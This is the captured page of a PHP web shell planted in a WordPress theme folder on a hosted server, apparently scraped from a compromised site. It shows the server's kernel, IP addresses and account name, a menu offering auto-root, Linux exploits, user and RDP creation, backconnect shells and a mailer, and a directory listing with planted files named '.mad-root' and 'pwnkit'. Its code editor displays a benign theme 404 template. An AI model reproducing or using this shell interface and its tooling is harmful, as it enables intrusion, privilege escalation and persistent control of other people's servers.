Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
always /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
2.54
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
comments.php
1.87
KB
-rw-r--r--
footer.php
1.32
KB
-rw-r--r--
functions.php
10.22
KB
-rw-r--r--
header.php
1.11
KB
-rw-r--r--
index.php
5.74
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
2.67
KB
-rw-r--r--
rtl.css
1.97
KB
-rw-r--r--
screenshot.png
234.71
KB
-rw-r--r--
singular.php
2.23
KB
-rw-r--r--
style.css
110.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found) * * @link https://codex.wordpress.org/Creating_an_Error_404_Page * * @package Always */ get_header(); ?> <div class="wrapper"> <div class="theme-panelarea"> <div id="site-contentarea" class="theme-panelarea-primary"> <main id="main" class="site-main" role="main"> <div class="theme-block error-block error-block-heading"> <header class="entry-header"> <h1 class="entry-title entry-title-large"> <?php esc_html_e('Oops! That page can’t be found.', 'always'); ?> </h1> </header> </div> <div class="theme-block error-block error-block-search"> <div class="wrapper-inner"> <div class="column column-8"> <?php get_search_form(); ?> </div> </div> </div> <div class="theme-block error-block error-block-top"> <div class="wrapper-inner"> <div class="column column-12"> <h2><?php esc_html_e('Maybe it’s out there, somewhere...', 'always'); ?></h2> <p><?php esc_html_e('You can always find insightful stories on our', 'always'); ?> <a href="<?php echo esc_url( home_url() ); ?>"><?php esc_html_e('Homepage','always'); ?></a></p> </div> </div> </div> <div class="theme-block error-block error-block-middle"> <div class="wrapper-inner"> <div class="column column-12"> <h2><?php esc_html_e('Still feeling lost? You’re not alone.', 'always'); ?></h2> <p><?php esc_html_e('Enjoy these stories about getting lost, losing things, and finding what you never knew you were looking for.', 'always'); ?></p> </div> </div> </div> <div class="theme-block error-block error-block-bottom"> <?php always_related_posts(); ?> </div> </main> </div> </div> </div> <?php get_footer();
Close